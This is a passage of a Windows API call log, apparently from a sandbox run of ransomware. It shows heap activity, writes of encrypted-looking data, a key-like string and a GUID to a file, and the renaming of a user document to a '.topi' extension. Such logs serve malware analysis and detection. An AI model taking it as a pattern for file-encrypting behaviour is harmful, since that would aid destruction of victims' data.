lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.093] GetCurrentThreadId () returned 0x8c4 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8fa0 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.094] GetCurrentThreadId () returned 0x8c4 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cb8 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4cd0 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cb8 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c88 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c70 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03170 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.097] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xd292, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xd292, lpOverlapped=0x0) returned 1 [0097.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.098] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd297, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.098] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.098] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.098] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.098] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.098] CloseHandle (hObject=0x6a8) returned 1 [0097.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ea28 [0097.112] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0097.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0097.112] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\zzCW5todK.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\zzcw5todk.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\P63p r8YwN7PV\\zzCW5todK.ots.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\p63p r8ywn7pv\\zzcw5todk.ots.topi")) returned 1 [0097.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.113] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.114] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33177c70, ftCreationTime.dwHighDateTime=0x1d5c27f, ftLastAccessTime.dwLowDateTime=0x9e8c4d10, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x9e8c4d10, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zzCW5todK.ots", cAlternateFileName="ZZCW5T~1.OTS")) returned 0 [0097.114] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0097.115] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0097.115] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.115] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.115] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.116] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.116] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4420 [0097.117] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.117] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 